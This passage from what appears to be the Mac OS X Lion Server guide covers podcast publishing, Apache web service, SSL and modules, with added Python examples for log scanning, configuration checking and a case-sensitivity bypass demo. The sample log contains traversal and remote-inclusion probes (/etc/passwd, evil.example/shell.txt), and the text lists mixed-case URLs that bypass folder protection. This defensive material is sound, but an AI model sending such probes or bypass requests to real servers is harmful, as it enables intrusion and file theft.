   - Authenticated Users: Allows only users in the server's user list to view episodes.
   - Podcast Owners: Allows only users in the Administrators list to view library content.
3. Optionally, add users to the Administrators list. Click the Add button (+) below the list, then choose a user from the list that appears. Podcast library administrators can delete other people's podcasts from the podcast library.
4. Click the On/Off button at the top of the pane to enable the library.

Users can share their podcasts with a podcast library from Podcast Publisher by specifying the address of the podcast library server in Podcast Publisher Preferences and then choosing Podcast Library from the Share menu.

User collaboration services

Podcast

Use Podcast Publisher

About Podcast Publisher

The new Podcast Publisher application in Mac OS X Lion makes it easy to create and publish podcasts. Use Podcast Publisher to record video of you, your computer display, or a narrated screen recording and organize these recordings into unique podcasts. You can also import audio and video you have on your computer. Then share the podcasts to iTunes on your computer, distribute them via email, save them to your desktop, or publish them to a Podcast Library where others can subscribe to and view them using iTunes. If you already use a Podcast Library hosted by the Podcast Producer service in Mac OS X Server v10.6 or later, you can publish there too.

RELATED INFORMATION

Create a podcast
Set up a podcast library

Understand podcasts and episodes

A podcast allows you to group audio files, video files, PDFs, and ePub documents about a topic or along a theme and share that content from a single Internet address. Other people can go to the same Internet address and see new information you add to your podcast. The episodes in your podcast are independent of one another, so you can mix audio and video files and PDF and ePub documents in a single podcast. You can create as many different podcasts as you like and as many episodes as you want in each podcast.

How people see your podcasts

After you create a podcast, you share it so others can view content you add to the podcast. A podcast has an address on the Internet that people can connect or subscribe to. People subscribe to a published podcast with a program like iTunes. When you publish episodes to your podcast, they are added to a subscriber's iTunes library. For this to happen, someone must host the podcast. Lion Server includes a way for you to easily host your own podcasts. This is called the Podcast service or the Podcast Library. Podcast Publisher sends your podcasts to the Podcast Library in Lion Server. If your organization is using Podcast Producer, you can also send your podcasts to it. To look at or share a specific episode before sending it to the Podcast Library, you can also share it through email, save it to your computer, or open it in iTunes on your computer.

Create a podcast

1. Open Podcast Publisher (in Applications/Utilities) and click New Podcast in the lower-left corner of the window. If you're opening Podcast Publisher for the first time, there's a new podcast ready for you.
2. Enter a podcast title, then click the "(+) Add a new episode" note. This title is for the entire podcast series. Each episode in the podcast has its own title, which you can set later.
3. Add content by recording from a camera attached to your computer or from audio or movie files you have. For more information, see Record content for an episode and Add existing content to a podcast.
4. Add episode information that your podcast subscribers can see in iTunes (or other applications they use to view your podcast). For more information, see Add information about your podcasts.
5. Preview the episode. Click the Play (right-facing triangle) button in the timeline below the podcast episode.
6. Share the episode. Choose how to share the episode from the Share menu, or click the Share button. For information, see Publish a podcast.

RELATED INFORMATION

Record content for an episode
Add existing content to a podcast
Publish a podcast

Record content for an episode

You can record video content for an episode from your computer screen, or from the built-in (or attached) camera on your computer. You can also record audio content.

1. Select a podcast. If you have more than one podcast, use the Right Arrow and Left Arrow keys to navigate between them. If you're in the recording screen for an episode, click All Podcasts to return to the episode preview pane.
2. Add content using one of the following:
   - Record video from camera: Click the New Video Episode button below the episode preview pane. When the recording pane appears, move the toggle at the lower left to the left to select the film strip icon. When you're ready, click the record button and click it again when you finish recording.
   - Record your computer screen: Click the New Video Episode button below the episode preview pane. When the recording pane appears, move the toggle at the lower left to the right to select the screen icon. Use the record button to start and stop recording. Speak as you record your actions to provide narration. The Podcast Publisher window does not appear in the recording. You can minimize it to get it out of the way or leave it open during recording.
   - Record audio: Click the New Audio Episode button below the episode preview pane. Use the record button to start and stop recording.

If the wrong New Audio Episode or New Video Episode button appears, click the arrow at the right of the button that is showing and select the action you want.

Add existing content to a podcast

You must have a valid media type to import into a podcast. Valid media types include:

Content   File type
Audio     MP3, MPEG-4, AIFF
Video     QuickTime Movie, MPEG-4, MPEG, 3GPP
Document  PDF, ePub

If you have an audio or video file that must be converted to a valid media type, try using QuickTime Player. The Pages app (available on the Mac App Store) lets you save documents as PDFs or ePub files. You can use audio and video files and some documents that you have on your computer to make podcasts.

1. From the File menu, select Import Media.
2. Navigate to your content and select Import.

Add information about your podcasts

You can modify the title and add comments, an author, dates, and related information to any episode in your podcast.

1. If you haven't already, open the episode in the editing pane of Podcast Publisher. If you just opened Podcast Publisher, navigate to the podcast and the episode. If you're in the recording screen for the episode, click Cancel to return to the episode view.
2. Click an item in the episode view.
3. Click the Info button at the top left.
4. Enter a title, the author's name, and text to describe the basic information about the episode. You can enter more information and find the URL of that episode by clicking the Show Advanced button.
5. When you finish annotating, click the Info button again, or click outside the Info panel to dismiss it.

Viewers can see the information you provide by clicking the Info button in iTunes when they watch the episode.

Publish a podcast

To share a finished podcast episode, you can open the episode in iTunes on the computer where it was created, email the episode to others, put a copy of the episode on your desktop, or publish the episode to a Podcast Library.

1. In Podcast Publisher, select the episode to share. The Share button appears at the right, below the episode preview. If you don't see the Share button, try again to select the episode or, if you're in the recording pane, click Cancel.
2. Click the Share menu or the Share button and choose how to share the episode:
   - iTunes: Adds the episode to the iTunes library. Audio and video files are added to Music and Movies; PDF and ePub documents are added to Books.
   - Mail: Creates an email message with the episode as an attachment. Recipients of your email can use iTunes to view your podcast episode.
   - Podcast Library: Publishes the episode in the Podcast Library on the server you choose. A confirmation message appears when the episode is published. A button in the message lets you announce the episode in email. Anyone with access to the library can view the episode, and it appears in iTunes for users who subscribe to the podcast.

RELATED INFORMATION

Set up a podcast library

User collaboration services

Podcast

Work with legacy podcast tools

Use Podcast Capture

Podcast Capture is a part of the Podcast Producer solution. Use Podcast Capture to capture and upload audio and video QuickTime movies to a Podcast Producer server for encoding and publishing. You can also use Podcast Capture to upload files for processing and publishing as a single podcast.

Set up Podcast Capture
- Set up Podcast Capture for the first time
- Bind a Mac to a Podcast Producer server
- Configure general Podcast Capture preferences
- Configure audio/visual Podcast Capture preferences

Use Podcast Capture
- Log in
- Record and upload audio from a single source
- Record and upload video from a single source
- Record and upload video from dual sources
- Record and upload a screen recording
- Monitor transfers
- Upload files
- Browse episodes
- Log out

About workflows

Use Podcast Composer

Podcast Composer simplifies and speeds up the process of building workflows by providing a simple graphical user interface. You provide information about the workflow, without writing XML code or worrying about where to store resources and credentials.

The Import stage: Select the input source of the content your workflow processes.
- Configure Single Source
- Configure Dual Source
- Configure Montage

The Edit stage: Brand your podcast with titles and opening and closing movies.
- Add and configure an introduction movie
- Add a title movie
- Add a watermark and an introduction overlay
- Add and configure an exit movie
- Configure transitions
- Preview the podcast

The Export stage: Select output formats for your podcast.
- Add QuickTime encoding formats
- Add compressor formats

The Publish stage: Configure destinations for your podcast.
- Send content to the Podcast Producer Library
- Send content to an Apple wiki server
- Send content using file transfer protocols
- Send content to the Watch folder of Final Cut Server
- Send content to a shared folder
- Send content to a workflow

The Notify stage: Use different technologies to notify others about your podcast.
- Add email notifications
- Add iChat notifications
- Add iTunes podcast directory notifications
- Add iTunes U notifications
- Add third-party service notifications

User collaboration services

Web

Overview

About web service

Use the Web pane of the Server app to host websites on your computer. Use web service to publish custom websites that you have created (or someone has created for you) using website development software. You can restrict access to each website to a specific group or restrict parts of the website to specific groups. You can also specify each website's IP address, an access port, and the folder where website files are stored on the server. A custom website is also called a virtual host.

If you want to allow Internet access to your websites and you have a cable router, DSL router, or other network router, your router must have port forwarding (port mapping) configured for web services. If your local network has a separate firewall device, ask the firewall administrator to open the firewall for the ports that web services use. If you add custom websites that use access port numbers other than 80, configure port forwarding for those ports as well.

Web service shares the Apache server with other services such as wiki and Profile Manager. For information about customizing Apache settings, enter man webapp.plist in Terminal.

RELATED TOPIC

Publish a website

About web technologies

Web service is based on Apache, an open source HTTP web server. In addition to the standard plugin modules distributed with Apache, Mac OS X Lion provides an expanded set of modules, which support PHP, Python, and directory-based authentication, including Kerberos. Web applications, such as the Roundcube mail client, use the PostgreSQL database management system. In the Server app, you can configure web service to host custom websites. For information about customizing Apache settings, enter man webapp.plist in Terminal.

About PostgreSQL

PostgreSQL provides a relational database management solution for your web server. With this open source software, you can link data in different tables or databases and provide the information on your website.

Wiki and Device Manager services require a PostgreSQL server, so it starts when either of these services is turned on. For information about PostgreSQL on your server, view its documentation at http://www.example.com/postgresql/ (replace www.example.com with your server's URL). For general PostgreSQL documentation, see www.postgresql.org/docs/.

User collaboration services

Web

Work with web service

Start or stop web service

Because many services rely on Apache, turning off web service doesn't stop Apache. Turning on web service does the following:

- If Apache isn't running, it starts Apache.
- It enables access through the default virtual host to content in the default document root, which is located at /Library/Server/Web/Data/Sites/Default/.
- It enables access to any custom sites added in the Server app.

You can use the Server app or the command line to start or stop web service. If you need to customize your web server settings, you can edit Apache configuration files and start web service from the command line.

Start web service in the Server app

1. In the Server app, click Web. If web service has never been turned on before, click Enable Service. If web service was previously turned on, the Enable Service dialog doesn't appear.
2. Choose On from the pop-up menu under the service name in the Web pane.

Start web service from the command line

Start web service with the serveradmin command or the Server app rather than with apachectl. The apachectl command acts like a master switch on the shared Apache instance: stopping it with apachectl also stops the Podcast, device manager, wiki, and web services that share that instance. The Server app and the serveradmin command turn services on and off separately. The servermgr_web plugin manages web service state for the serveradmin command; for information about it, enter man servermgr_web in Terminal.

Enter the following command in Terminal:

sudo serveradmin start web

Stop web service in the Server app

1. In the Server app, click Web. If web service is already turned off, an Enable Service dialog appears.
2. Choose Off in the pop-up menu under the service name.

Stop web service from the command line

Enter the following command in Terminal:

sudo serveradmin stop web

View web service logs

Web service uses the standard Apache log format, so you can view the logs using Console, command-line tools, or third-party log analysis tools. Apache logs are located in /var/log/apache2/, which is also reachable as /Library/Logs/WebServer/. You can also view /Library/Logs/WebConfig.log. The PostgreSQL log is /Library/Logs/PostgreSQL.log.

View web service logs in Console

1. Open Console (located in Launchpad, in the Utilities folder).
2. Under Files, navigate to the logs to view and click them. For example, to view the Apache error log, click the disclosure triangle for /private/var/log, click the disclosure triangle for apache2, and then click error_log.

View web service logs from the command line

To view the latest entries in a log, enter:

$ tail log-file

Replace log-file with the path of the log file.
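Because the access log is in Apache's standard combined format, it can be scanned with a short script as well as viewed with tail. The script below is an added example, not part of this page or of Lion Server: it parses combined-format lines and flags the two things a web administrator most often wants out of this log, requests whose paths look like traversal or remote-include probes, and clients that keep failing authentication against protected folders. The log lines are constructed for the example, and the pattern list and the failure threshold are assumptions to tune for your sites.

```python
import re
from collections import Counter

# Constructed lines in Apache "combined" log format; not from a real server.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [09/Jul/2012:10:00:01 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jul/2012:10:00:02 -0700] "GET /wiki/ HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0"
198.51.100.23 - - [09/Jul/2012:10:01:10 -0700] "GET /../../etc/passwd HTTP/1.1" 400 226 "-" "curl/7.21.4"
198.51.100.23 - - [09/Jul/2012:10:01:11 -0700] "GET /Protected/secret HTTP/1.1" 401 381 "-" "curl/7.21.4"
198.51.100.23 - - [09/Jul/2012:10:01:12 -0700] "GET /Protected/secret HTTP/1.1" 401 381 "-" "curl/7.21.4"
198.51.100.23 - - [09/Jul/2012:10:01:13 -0700] "GET /Protected/secret HTTP/1.1" 401 381 "-" "curl/7.21.4"
198.51.100.23 - alice [09/Jul/2012:10:01:20 -0700] "GET /Protected/secret HTTP/1.1" 200 77 "-" "curl/7.21.4"
192.0.2.77 - - [09/Jul/2012:10:05:00 -0700] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 404 209 "-" "Mozilla/4.0"
"""

# Combined format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Assumed probe signatures: directory traversal, its URL-encoded form, a classic
# target file, and a URL passed as a parameter value (remote file inclusion attempts).
SUSPICIOUS_PATH = re.compile(r"(\.\./|%2e%2e|/etc/passwd|=https?://)", re.IGNORECASE)

def parse_access_log(text):
    """Yield one dict per well-formed combined-format line."""
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec

def find_suspicious(text, auth_failure_threshold=3):
    """Return (probe hits as (ip, path, status), client IPs with >= threshold 401 responses)."""
    probe_hits = []
    auth_failures = Counter()
    for rec in parse_access_log(text):
        if SUSPICIOUS_PATH.search(rec["path"]):
            probe_hits.append((rec["ip"], rec["path"], rec["status"]))
        if rec["status"] == 401:
            auth_failures[rec["ip"]] += 1
    repeated = sorted(ip for ip, n in auth_failures.items() if n >= auth_failure_threshold)
    return probe_hits, repeated

if __name__ == "__main__":
    import sys
    # Run as: python3 scanlog.py < /var/log/apache2/access_log
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ACCESS_LOG
    hits, repeated = find_suspicious(text)
    for ip, path, status in hits:
        print(f"probe  {ip:16s} {status} {path}")
    for ip in repeated:
        print(f"repeated 401s from {ip}")
```

On the sample this reports the traversal and remote-include probes and the client that failed basic authentication three times before succeeding, which is the sequence to look for when a protected folder's credentials are being guessed.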

Tune web service performance

The default web service performance settings are tuned to recommended values. You can customize performance settings such as the maximum number of client connections and how long a connection stays open before timing out. To tune website performance, edit /etc/apache2/httpd.conf. This Apache configuration file includes key performance tuning settings such as:

Setting: MaxClients 1024
Description: The maximum number of simultaneous connections. The range is 1 to 1024 connections. You can use a percentage of the maximum number of processes available instead of a hard value by following the value with a "%" character, for example MaxClients 50%.

Setting: ServerLimit 1024
Description: The upper limit for the MaxClients setting. This is typically set to the same value as MaxClients. You can use a percentage of the maximum number of processes available instead of a hard value by following the value with a "%" character, for example ServerLimit 50%.

Setting: Timeout 300
Description: The number of seconds the server waits for a request to arrive, or for a client to accept a response, before closing the connection.

Setting: MinSpareServers 1, MaxSpareServers 10
Description: The minimum and maximum number of idle spare server processes. If fewer than the minimum are idle, the server adds spare processes at a rate of one per second. If more than the maximum are idle, the server stops creating spare processes and retires the surplus.

Setting: StartServers 1
Description: The number of server processes created at startup.

Setting: MaxKeepAliveRequests 100
Description: The maximum number of requests allowed on one persistent (keep-alive) connection before the server closes it. The range is 1 to 2,048.

Setting: KeepAliveTimeout 15
Description: The number of seconds that can pass between requests on a persistent connection before the web server closes it. The range is 0 to 9,999 seconds.
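Edits to httpd.conf take effect only at the next restart, and a value outside the ranges in the table above, or a MaxClients larger than ServerLimit, is something you want to catch before that restart. The following checker is an added example, not part of this page or of Lion Server: it reads the directives from a httpd.conf fragment, applies the ranges the table gives, and reports MaxClients exceeding ServerLimit (Apache lowers MaxClients to ServerLimit at startup and logs a warning). The configuration fragment is constructed, and resolving a percentage value against ServerLimit is an assumption about what "percentage of the maximum number of processes" means.

```python
import re

# Constructed httpd.conf fragment (not from a real Lion Server). MaxKeepAliveRequests
# is deliberately out of range, and MaxClients deliberately exceeds ServerLimit.
SAMPLE_HTTPD_CONF = """\
# performance section
Timeout 300
KeepAlive On
MaxKeepAliveRequests 4096
KeepAliveTimeout 15
<IfModule prefork.c>
    StartServers 1
    MinSpareServers 1
    MaxSpareServers 10
    ServerLimit 512
    MaxClients 1024
</IfModule>
"""

# Ranges as given in the tuning table on this page.
RANGES = {
    "MaxClients": (1, 1024),
    "ServerLimit": (1, 1024),
    "MaxKeepAliveRequests": (1, 2048),
    "KeepAliveTimeout": (0, 9999),
}

# A simple "Directive value" line; container tags (<IfModule ...>) and comments do not match.
DIRECTIVE_RE = re.compile(r"^\s*([A-Za-z]+)\s+(\S+)\s*$")

def parse_directives(text):
    """Return {directive: raw value} for one-value directives; later occurrences win."""
    found = {}
    for line in text.splitlines():
        m = DIRECTIVE_RE.match(line)
        if m and not line.lstrip().startswith("#"):
            found[m.group(1)] = m.group(2)
    return found

def resolve(value, server_limit):
    """Turn '50%' into an absolute count relative to ServerLimit (assumption); integers pass through."""
    if value.endswith("%"):
        return server_limit * int(value[:-1]) // 100
    return int(value)

def lint(text):
    """Return a list of human-readable problems; an empty list means the fragment passes."""
    d = parse_directives(text)
    problems = []
    server_limit = resolve(d.get("ServerLimit", "1024"), 1024)
    for name, (lo, hi) in RANGES.items():
        if name in d:
            v = resolve(d[name], server_limit)
            if not lo <= v <= hi:
                problems.append(f"{name} {d[name]} outside {lo}-{hi}")
    if "MaxClients" in d and resolve(d["MaxClients"], server_limit) > server_limit:
        problems.append(f"MaxClients exceeds ServerLimit ({server_limit}); Apache lowers it to ServerLimit at startup")
    if "MinSpareServers" in d and "MaxSpareServers" in d and int(d["MinSpareServers"]) > int(d["MaxSpareServers"]):
        problems.append("MinSpareServers exceeds MaxSpareServers")
    return problems

if __name__ == "__main__":
    import sys
    # Run as: python3 lint_httpd.py < /etc/apache2/httpd.conf
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_HTTPD_CONF
    for p in lint(text) or ["no problems found"]:
        print(p)
```

The checker looks only at the directives the table lists; the MPM section of a real httpd.conf contains more, and apachectl configtest remains the authority on whether Apache will accept the file at all.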

User collaboration services

Web

Create websites

Publish a website

You can create a website using web development software of your choice, or have someone do it for you, and then copy the website files to your server. Then use the Server app to publish your websites. You can secure your website by enabling Secure Sockets Layer (SSL). You can create a self-signed SSL certificate in the Server app, or use one from a certificate authority (CA).

When you turn on web service, a default website is created and custom websites you create are enabled. The default website responds to all server IP addresses and host names on port 80. If you enable SSL, the default website responds on port 443, and a website on port 80 redirects everything to port 443. The website initially uses a placeholder page that you can replace with your own.

If you need a website to use a specific IP address, or if you want to change settings such as the host name, port, or access control, you can create custom websites. For example, you can create multiple custom websites with different host names, serving the same content by sharing the same document root folder. The websites you publish with the Server app are also known as virtual hosts.

Create a custom website

1. In the Web pane of the Server app, click the Add button (+). A dialog with options appears.
2. Customize your website using the following settings:

   Domain Name: Enter the website's fully qualified domain name.
   IP Address: If your server has multiple IP addresses, choose the IP address used to access the website.
   Store Site Files In: Choose a folder on your local computer to store your website files. This folder should include an index.html or index.php file to act as your website home page. To view the folder contents, click View Document Root Contents at the bottom of the setup dialog.
   Who Can Access: Choose who can access folders in the website. By default, everyone can access all folders. If you choose Customize, you can restrict access to subfolders of your website to groups you create in the Server app.

3. Click Done.
4. If web service isn't turned on, click the On/Off switch to turn on the service.

To change website settings after creating a custom website, select the website in the Web pane of the Server app and click the Edit button (pencil). You can't change the host name or document root folder settings.

Add or change webpages on your website

To change what's available on the website, change the files in your website's document root folder. Use the Server app to find your website's document root. The default document root is /Library/Server/Web/Data/Sites/domainname/.

1. In the Web pane of the Server app, select the website and click the Edit button (pencil). A dialog with options appears. The document root is shown in the Store Site Files In pop-up menu.
2. Click View Document Root Contents. The Finder opens to the document root location. Change the files in this folder to change what's available on the website.

RELATED TOPICS

Start or stop a service
SSL certificates
Use an SSL certificate

Make websites and wikis more secure

You can enable Secure Sockets Layer (SSL) for websites and wikis to make them more secure. The server can use an SSL certificate to identify itself electronically and communicate securely with computers and other servers on the local network and the Internet. You can use the self-signed certificate created for your server when you set it up, or a self-signed certificate you created, but users' browsers won't trust these and will display messages asking whether the user trusts your certificate. Users who learn to click through such warnings will also click through the warning for an impostor's certificate, so use a CA-signed certificate for anything beyond testing.

When you enable SSL for websites, it enables SSL for all web applications, such as wikis. The URLs for your websites and wikis start with https instead of http. If you go to the http URL for your website, you are redirected to the https version. SSL websites use port 443, while non-SSL websites use port 80.

1. In the Server app, select your server (below Hardware on the left side of the Server app).
2. Click Settings, then click the Edit button at the right of SSL Certificate.
3. Choose one of the following:

   To use an SSL certificate for iCal, Address Book, iChat, Mail, and web services: Choose a certificate from the Certificate pop-up menu.
   To use an SSL certificate for just web service: Choose Custom in the Certificate pop-up menu. In the list that appears, choose an SSL certificate from the pop-up menu at the right of web service.

RELATED TASKS

Obtain a CA-signed certificate

Secure web content on case-insensitive file systems

Use case-sensitive disk volume formats such as Mac OS Extended (Case-sensitive) or Mac OS Extended (Case-sensitive, Journaled) to serve access-controlled web content. In these volume formats, folders named Protected and PrOtECted are two different folders. The plain Mac OS Extended volume format preserves the case of file names but does not distinguish between a file or folder named Protected and one named PrOtECted.

The mod_hfs_apple module, which is enabled by default, prevents using case insensitivity to bypass security. Without mod_hfs_apple, this insensitivity could be an issue when your web content resides on this type of volume and you are attempting to restrict access to all or part of your web content. If you require browsers to use a name and a password for read-only access to content in a folder named Protected, browsers must authenticate to access the following URLs:

http://example.com/Protected
http://example.com/Protected/secret
http://example.com/Protected/sECreT

Without the mod_hfs_apple module enabled, they could bypass the restriction by using something like the following:

http://example.com/PrOtECted
http://example.com/PrOtECted/secret
http://example.com/PrOtECted/sECreT

Note: The mod_hfs_apple module operates on folders. It is not intended to prevent access to individual files. A file named secret can be accessed as seCREt. This is correct behavior, and doesn't enable bypassing security. For information about choosing who can access secure web content, see Publish a website.
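The bypass and the mod_hfs_apple fix, reduced to their essentials as an added example (this is not the module's code and not part of this page). A small in-memory directory tree stands in for a case-insensitive, case-preserving volume: a lookup matches each path component in any case but returns the spelling actually on disk. The naive access check compares the request path as typed against the protected folder, so a different spelling of the folder name slips past it; the hardened check resolves the request to the on-disk names first, as mod_hfs_apple does for directories, and keeps files reachable under any spelling, which is the note's point. The tree, the protected folder and the status codes are constructed for the example.

```python
# Constructed in-memory volume: folder path -> on-disk entry names (case preserved).
DISK = {
    "/": ["Protected", "public"],
    "/Protected": ["secret", "report.pdf"],
    "/public": ["index.html"],
}

# Folders that require authentication, spelled as they are on disk
# (what a <Directory> block with Require valid-user would name).
PROTECTED_DIRS = ["/Protected"]

def lookup_insensitive(path):
    """Resolve a request path as a case-insensitive volume does: each component
    matches regardless of case. Returns the on-disk spelling, or None if absent."""
    resolved = ""
    parent = "/"
    for comp in [c for c in path.split("/") if c]:
        entries = DISK.get(parent, [])
        match = next((e for e in entries if e.casefold() == comp.casefold()), None)
        if match is None:
            return None
        resolved = resolved + "/" + match
        parent = resolved
    return resolved or "/"

def naive_requires_auth(request_path):
    """Access check keyed on the path exactly as the client typed it (bypassable)."""
    return any(request_path == d or request_path.startswith(d + "/") for d in PROTECTED_DIRS)

def hardened_requires_auth(request_path):
    """Normalize to the on-disk folder names before matching, as mod_hfs_apple does for folders."""
    on_disk = lookup_insensitive(request_path)
    if on_disk is None:
        return False            # nothing to serve; the server answers 404 regardless
    return any(on_disk == d or on_disk.startswith(d + "/") for d in PROTECTED_DIRS)

def serve(request_path, authenticated, requires_auth):
    """Return the HTTP status the server would send for this request under the given check."""
    if lookup_insensitive(request_path) is None:
        return 404
    if requires_auth(request_path) and not authenticated:
        return 401
    return 200

if __name__ == "__main__":
    for path in ["/Protected/secret", "/Protected/sECreT", "/PrOtECted/secret", "/public/INDEX.html"]:
        print(f"{path:22s} naive={serve(path, False, naive_requires_auth)} "
              f"hardened={serve(path, False, hardened_requires_auth)}")
```

The unauthenticated request for /PrOtECted/secret is served by the naive check and refused by the hardened one, while /Protected/sECreT is refused by both and a differently cased file name under a public folder is served by both.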

Let users change their password

If you host a website and have an SSL certificate associated with web service, you can enable a web page that users can use to change their password. The SSL requirement keeps the old and new passwords from crossing the network in the clear. If you enable wiki service, a Change Password link appears at the bottom of the default wiki server home page. The change password page is located at https://websiteURL/changepassword.

1. In the Web pane of the Server app, select a website and click Edit (pencil).
2. Select "Allow users to change their password." If "Allow users to change their password" is deactivated, you don't have an SSL certificate associated with web service. For information about using SSL certificates, see Use an SSL certificate.
3. Click Done.
4. If web service isn't turned on, click the On/Off switch to turn on the service.

RELATED TASKS

Host wikis on your server

User collaboration services

Web

Work with open source applications

Work with Apache

Apache is the open source HTTP web server provided with Mac OS X Lion. You can use the Server app to manage web service with the default Apache settings. To change advanced Apache settings, edit Apache configuration files and change or add Apache modules.

Mac OS X Lion runs Apache web server v2.2 as a 64-bit process on 64-bit computers. In a clean installation of Mac OS X Lion Server, Apache v2.2 is installed. If you are using Apache v1.3 on Mac OS X Server v10.5 and you upgrade to Mac OS X Lion, Apache 2.2 is installed using its default configuration, and your Apache v1.3 configuration files are preserved in the /etc/httpd-1.3/ folder. You can migrate Apache using one of the following methods:

- Use the apache1_config_helper script to help automate the Apache v1.3 to v2.2 migration.
- Use a text editor to customize the Apache configuration.

The locations of key Apache files and folders are listed below.

File or folder: Location
- Web service configuration files: /etc/apache2/
- Main web service configuration file: /etc/apache2/httpd.conf
- Website configuration files: /etc/apache2/sites/
- Template for new websites created in the Server app: /etc/apache2/sites_disabled/uid_default_default.conf
- Web application configuration files: /etc/apache2/webapps/
- Executable file: /usr/sbin/httpd
- Web modules: /usr/libexec/apache2/
- Error log: /var/log/apache2/ (with a symlink that lets the folder be viewed as /Library/Logs/WebServer/)
- Temporarily disabled websites: /etc/apache2/sites_disabled/
- Static content: /Library/Server/Web/Data/Sites/Default/ (default)
- CGI files: /Library/WebServer/CGI-Executables/

Files in /etc/apache2/sites/ are read and processed by Apache when it performs a hard or soft (graceful) restart. You disable sites by moving them from /etc/apache2/sites/ to /etc/apache2/sites_disabled/ and restarting web service. Each time you save changes, the server restarts. If you edit a file using a text editor that creates a temporary or backup copy, the server restart might fail because two files with almost identical names are present. To avoid this problem, delete temporary or backup files created when editing files in this folder.

For information about important Apache configuration files, see the ReadMe.txt file in /etc/apache2/. For Apache web server v2.2 documentation, see http://httpd.apache.org/docs/2.2/. For information about web application configuration files, enter man webapp.plist in Terminal.

Enable or disable PHP

You can enable or disable PHP for websites using the Server app. You can write PHP scripts to create dynamic web content or web applications.

1. In the Web pane of the Server app, select "Enable PHP web applications" to enable PHP or deselect it to disable PHP. If webmail is turned on, PHP is enabled and can't be disabled.
2. If web service isn't turned on, click the On/Off switch to turn on the service.

RELATED TASKS

Enable Webmail

User collaboration services

Web

Work with open source applications

Restore the default web configuration


You can restore the default Apache configuration without reinstalling Mac OS X Lion. The folders with Apache configuration files have read-only .default files that store the default Apache settings. You can run a command in Terminal that replaces all changed configuration files with these default files. Any edits you made to those files are lost, so copy them elsewhere first if you want to keep them. For information about important Apache configuration files, see the ReadMe.txt file in /etc/apache2/.

1. Open Terminal.
2. Enter the following command:
$ sudo serveradmin command web:command=restoreFactorySettings
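As an added example (not from this guide), the Python below shows the check a cautious administrator would run first: it compares each live Apache configuration file with its read-only default copy, backs up the ones that differ, and only then runs the restoreFactorySettings command above. It assumes the defaults are stored beside the live files as <name>.default, which is an assumption to confirm against /etc/apache2/ReadMe.txt; the backup folder under /var/root is a choice of this example, and the file contents in the test are constructed.

```python
"""Added example (not from the Lion Server guide): list the Apache
configuration files that differ from their read-only defaults and back the
changed ones up before running the restoreFactorySettings command.
Assumes each default sits beside its live file as <name>.default.
"""
import filecmp
import os
import shutil
import subprocess
import time


def changed_configs(conf_dir):
    """Return the live files in conf_dir that differ from, or are missing
    next to, their <name>.default copies. An empty list means the restore
    would change nothing."""
    changed = []
    for name in sorted(os.listdir(conf_dir)):
        if not name.endswith(".default"):
            continue
        default = os.path.join(conf_dir, name)
        live = default[: -len(".default")]
        if not os.path.isfile(live) or not filecmp.cmp(default, live, shallow=False):
            changed.append(live)
    return changed


def restore_defaults_with_backup(conf_dir="/etc/apache2", backup_root="/var/root"):
    """Copy every changed live file into a timestamped folder, then run the
    serveradmin command the guide documents. Returns the backup folder, or
    None when nothing differed and no backup was made."""
    changed = changed_configs(conf_dir)
    backup_dir = None
    if changed:
        backup_dir = os.path.join(
            backup_root, "apache2-backup-%s" % time.strftime("%Y%m%d%H%M%S"))
        os.makedirs(backup_dir)
        for live in changed:
            if os.path.isfile(live):  # a missing live file has nothing to save
                shutil.copy2(live, os.path.join(backup_dir, os.path.basename(live)))
    subprocess.run(
        ["sudo", "serveradmin", "command", "web:command=restoreFactorySettings"],
        check=True,
    )
    return backup_dir
```

changed_configs is safe to run at any time; restore_defaults_with_backup is the destructive step and needs administrator rights.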

User collaboration services

Web

Work with open source applications

Work with web applications


Web service allows you to run web applications and web application frameworks such as MacRuby and Ruby on Rails. Mac OS X Server v10.6 used a Mongrel server to support Ruby on Rails applications. Mac OS X Lion uses control_tower for MacRuby and the Thin web server for Ruby on Rails. For information about control_tower, enter man control_tower in Terminal. For information about the Thin web server, see the Thin website at code.macournoyer.com/thin/. For a list of Thin web server options, enter thin in Terminal. In addition to using the Server app, you can start or stop web service and configure web service settings by using the servermgr_web and webappctl commands. For information about these commands, enter man servermgr_web and man webappctl in Terminal. You can define the web applications managed by servermgr_web by editing plist files located in /etc/apache2/webapps/. For information about these plist files, enter man webapp.plist in Terminal.

User collaboration services

Web

Manage web modules

About Apache web modules


Apache includes modules that add functionality to your website. Apache comes with several standard modules, and you can purchase additional modules from software vendors or download them from the Internet. You can find information about available Apache modules at www.apache.org/docs/mod. Before enabling or disabling modules, you should have a specific functionality goal and fully understand the implications. Some web modules are mutually exclusive or are interdependent. Here are some examples:

auth_digest_module and digest_module must never be enabled simultaneously.
proxy_module must be enabled if proxy_connect_module, proxy_ftp_module, proxy_http_module, proxy_ajp_module, or proxy_balancer_module is enabled.
dav_module and dav_fs_module should be in the same state.
mod_dav_svn requires that mod_dav and mod_dav_fs are enabled.
encoding_module requires that headers_module, dav_module, and dav_fs_module are enabled.
cache_module is required for mem_cache_module and disk_cache_module.
mod_userdir is disabled by default. mod_userdir_apple, a secure replacement for mod_userdir, does not distinguish between nonexistent users and users who cannot access userdir, so a request for a ~name URL can't be used to confirm whether an account exists. mod_userdir_apple is also disabled by default. When mod_userdir and mod_userdir_apple are disabled, a browser can't access content from a user's Sites folder. For example, if your server is named example.com and the user's short name is refuser, the content of the Sites folder can no longer be accessed at http://example.com/~refuser. mod_userdir and mod_userdir_apple must never be enabled simultaneously.
mod_bonjour is disabled by default, but requires at least one of the two mod_userdir modules for full functionality.
